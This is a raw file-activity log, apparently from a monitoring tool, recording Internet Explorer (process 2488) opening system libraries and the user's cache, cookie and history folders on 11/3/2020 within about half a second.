11/3/2020 - 11:45:46.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nls
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEFRAME.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE.Local
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.Manifest
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE.Local
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rpcss.dll
11/3/2020 - 11:45:46.465Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rpcss.dll
11/3/2020 - 11:45:46.481Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\uxtheme.dll
11/3/2020 - 11:45:46.481Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\uxtheme.dll
11/3/2020 - 11:45:46.481Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\Secur32.dll
11/3/2020 - 11:45:46.481Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\secur32.dll
11/3/2020 - 11:45:46.481Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\secur32.dll
11/3/2020 - 11:45:46.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.497Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.497Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.497Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winhttp.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winhttp.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\webio.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\webio.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mswsock.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mswsock.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IPHLPAPI.DLL
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\WINNSI.DLL
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winnsi.dll
11/3/2020 - 11:45:46.512Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winnsi.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\CRYPTSP.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptsp.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptsp.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\RpcRtRemote.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\RpcRtRemote.dll
11/3/2020 - 11:45:46.668Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:46.668Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\RpcRtRemote.dll
11/3/2020 - 11:45:46.668Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.762Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.762Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\dwmapi.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dwmapi.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dwmapi.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:46.762Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\bcrypt.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcrypt.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcrypt.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcryptprimitives.dll
11/3/2020 - 11:45:46.762Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
11/3/2020 - 11:45:46.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcryptprimitives.dll
11/3/2020 - 11:45:46.762Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\MSHTML.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\d2d1.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d2d1.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d2d1.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\DWrite.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\DWrite.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\DWrite.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\dxgi.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dxgi.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dxgi.dll
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:46.856Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\DXGIDebug.dll
11/3/2020 - 11:45:46.872Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\DXGIDebug.dll
11/3/2020 - 11:45:46.872Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\DXGIDebug.dll
11/3/2020 - 11:45:46.872Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE.Local
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\apphelp.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\MLANG.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mlang.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mlang.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\PROPSYS.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.918Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.918Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.934Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:46.934Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.934Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.934Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:46.934Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:46.934Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:46.934Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History
11/3/2020 - 11:45:46.934Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
11/3/2020 - 11:45:46.934Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5
